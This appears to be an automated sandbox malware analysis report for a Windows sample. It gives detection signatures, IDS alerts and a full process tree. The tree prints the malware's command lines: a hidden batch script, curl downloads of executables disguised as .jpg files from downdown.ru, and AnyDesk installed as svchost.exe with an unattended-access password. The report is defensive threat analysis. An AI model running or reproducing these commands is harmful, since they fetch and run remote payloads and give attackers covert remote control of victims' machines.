Windows
Analysis Report
Yv24LkKBY6.exe
Overview
General Information
Field | Value
---|---
Sample name | Yv24LkKBY6.exe (renamed because the original name is a hash value)
Original sample name | de998bd26ea326e610cc70654499cebfd594cc973438ac421e4c7e1f3b887617.exe
Analysis ID | 1588958
MD5 | f0aba799546b1ce04037793579de3c94
SHA1 | 3477b56ece979666e4b094534e074f39d52545fe
SHA256 | de998bd26ea326e610cc70654499cebfd594cc973438ac421e4c7e1f3b887617
Tags | exe, user-adrian__luca
Detection
Field | Value
---|---
Score | 100
Range | 0 - 100
Whitelisted | false
Confidence | 100%
Signatures
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Allocates memory in foreign processes
Disables DEP (Data Execution Prevention) for certain images
Downloads files with wrong headers with respect to MIME Content-Type
Drops PE files with benign system names
Found stalling execution ending in API Sleep call
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global get message hook
Machine Learning detection for sample
Modifies Group Policy settings
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Installs a global mouse hook
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Classification
- System is w10x64
- Yv24LkKBY6.exe (PID: 7688 cmdline: "C:\Users\user\Desktop\Yv24LkKBY6.exe" MD5: F0ABA799546B1CE04037793579DE3C94)
- Acrobat.exe (PID: 7772 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Intel\ 131.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
- AcroCEF.exe (PID: 8176 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- AcroCEF.exe (PID: 5900 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1728,i,14928983996572785207,966126962154739653,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- cmd.exe (PID: 7812 cmdline: "C:\Windows\System32\cmd.exe" /c echo>C:\Intel\rezet.cmd cd C:\Intel\ MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- attrib.exe (PID: 7976 cmdline: "C:\Windows\System32\attrib.exe" +s +h C:\Intel MD5: 0E938DD280E83B1596EC6AA48729C2B0)
- conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 8056 cmdline: "C:\Windows\System32\cmd.exe" /c echo>> C:\Intel\rezet.cmd ping -n 6 127.0.0.1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 8112 cmdline: "C:\Windows\System32\cmd.exe" /c echo>> C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\driver.exe http://downdown.ru/driver.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7188 cmdline: "C:\Windows\System32\cmd.exe" /c echo>> C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\blat.exe http://downdown.ru/blat.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 1356 cmdline: "C:\Windows\System32\cmd.exe" /c echo>> C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\svchost.exe http://downdown.ru/svchost.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 3132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 8080 cmdline: "C:\Windows\System32\cmd.exe" /c echo>> C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\Trays.rar http://downdown.ru/Trays.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 5944 cmdline: "C:\Windows\System32\cmd.exe" /c echo>> C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\AnyDesk\wol.ps1 http://downdown.ru/wol.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 2716 cmdline: "C:\Windows\System32\cmd.exe" /c echo>> C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\dc.exe http://downdown.ru/dc.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 2988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 1272 cmdline: "C:\Windows\System32\cmd.exe" /c echo>> C:\Intel\rezet.cmd C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\Trays.rar C:\Intel\ /y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 2052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7720 cmdline: "C:\Windows\System32\cmd.exe" /c echo>> C:\Intel\rezet.cmd start C:\Intel\Trays\Trays.lnk MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 3236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 2624 cmdline: "C:\Windows\System32\cmd.exe" /c echo>> C:\Intel\rezet.cmd svchost.exe --install C:\Intel\AnyDesk MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 2876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 2012 cmdline: "C:\Windows\System32\cmd.exe" /c echo>> C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\AnyDesk\bat.bat http://downdown.ru/bat.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 1460 cmdline: "C:\Windows\System32\cmd.exe" /c echo>> C:\Intel\rezet.cmd C:\Intel\AnyDesk\bat.lnk MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 4108 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Intel\rezet.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 4196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- PING.EXE (PID: 7924 cmdline: ping -n 6 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
- curl.exe (PID: 8492 cmdline: C:\Intel\curl.exe -o C:\Intel\driver.exe http://downdown.ru/driver.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4)
- curl.exe (PID: 8588 cmdline: C:\Intel\curl.exe -o C:\Intel\blat.exe http://downdown.ru/blat.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4)
- curl.exe (PID: 8616 cmdline: C:\Intel\curl.exe -o C:\Intel\svchost.exe http://downdown.ru/svchost.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4)
- curl.exe (PID: 8680 cmdline: C:\Intel\curl.exe -o C:\Intel\Trays.rar http://downdown.ru/Trays.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4)
- curl.exe (PID: 8712 cmdline: C:\Intel\curl.exe -o C:\Intel\AnyDesk\wol.ps1 http://downdown.ru/wol.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4)
- curl.exe (PID: 8736 cmdline: C:\Intel\curl.exe -o C:\Intel\dc.exe http://downdown.ru/dc.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4)
- driver.exe (PID: 8764 cmdline: C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\Trays.rar C:\Intel\ /y MD5: 29086D9247FDF40452563C11B3DCA394)
- Trays.exe (PID: 8808 cmdline: "C:\Intel\Trays\Trays.exe" -tray MD5: 90D208B856DEA18596D57FFB1DD3A867)
- 4t-min64.exe (PID: 8836 cmdline: "C:\Intel\Trays\4t-min64.exe" "C:\Intel\Trays\ShellEh6055x64.dll" MD5: 7BC3AEEDC18717D796F1C7FF8DBF0C17)
- svchost.exe (PID: 8824 cmdline: svchost.exe --install C:\Intel\AnyDesk MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- svchost.exe (PID: 8928 cmdline: "C:\Intel\svchost.exe" --local-service MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- svchost.exe (PID: 8936 cmdline: "C:\Intel\svchost.exe" --local-control MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- curl.exe (PID: 8348 cmdline: C:\Intel\curl.exe -o C:\Intel\AnyDesk\bat.bat http://downdown.ru/bat.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4)
- cmd.exe (PID: 3556 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Intel\AnyDesk\bat.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- cmd.exe (PID: 3656 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo QWERTY1234566 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- AnyDesk.exe (PID: 5276 cmdline: AnyDesk.exe --set-password _unattended_access MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- svchost.exe (PID: 5968 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- AnyDesk.exe (PID: 9160 cmdline: "C:\Intel\AnyDesk\AnyDesk.exe" --service MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- AnyDesk.exe (PID: 5484 cmdline: "C:\Intel\AnyDesk\AnyDesk.exe" --control MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- AnyDesk.exe (PID: 8208 cmdline: "C:\Intel\AnyDesk\AnyDesk.exe" --new-install MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- AnyDesk.exe (PID: 1616 cmdline: "C:\Intel\AnyDesk\AnyDesk.exe" --crash-handler MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
- svchost.exe (PID: 1676 cmdline: C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 8148 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 8204 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- gpscript.exe (PID: 3184 cmdline: gpscript.exe /RefreshSystemParam MD5: 94FC20DD55459F467A22817CC3B089E5)
- svchost.exe (PID: 8608 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: vburov: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
---|---|---|---|---|---|---|---|---
2025-01-11T07:39:24.252062+0100 | 2008754 | 1 | A Network Trojan was detected | 185.125.51.5 | 80 | 192.168.2.9 | 49882 | TCP
2025-01-11T07:39:16.365645+0100 | 2025169 | 1 | A Network Trojan was detected | 185.125.51.5 | 80 | 192.168.2.9 | 49829 | TCP
2025-01-11T07:39:16.365645+0100 | 2025161 | 1 | A Network Trojan was detected | 185.125.51.5 | 80 | 192.168.2.9 | 49829 | TCP
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | Joe Sandbox ML: |
Source: | Binary or memory string: | memstr_79c078d0-b |
Source: | Static PE information: |
Source: | File created: | ||
Source: | File created: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 43_2_00B8CD06 | |
Source: | Code function: | 43_2_00B8FCDD | |
Source: | Code function: | 49_2_0040F8BC | |
Source: | Code function: | 50_2_045C4400 | |
Source: | Code function: | 50_2_00407C0E | |
Source: | Code function: | 50_2_0040DB44 | |
Source: | Code function: | 50_2_0040DDDC | |
Source: | Code function: | 51_2_021D4400 | |
Source: | Code function: | 53_2_021D4400 | |
Source: | Code function: | 54_2_021D4400 |
Source: | Code function: | 50_2_00407D0E |
Source: | Code function: | 52_2_00418560 |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | Network Connect: |
Source: | Image file has PE prefix: |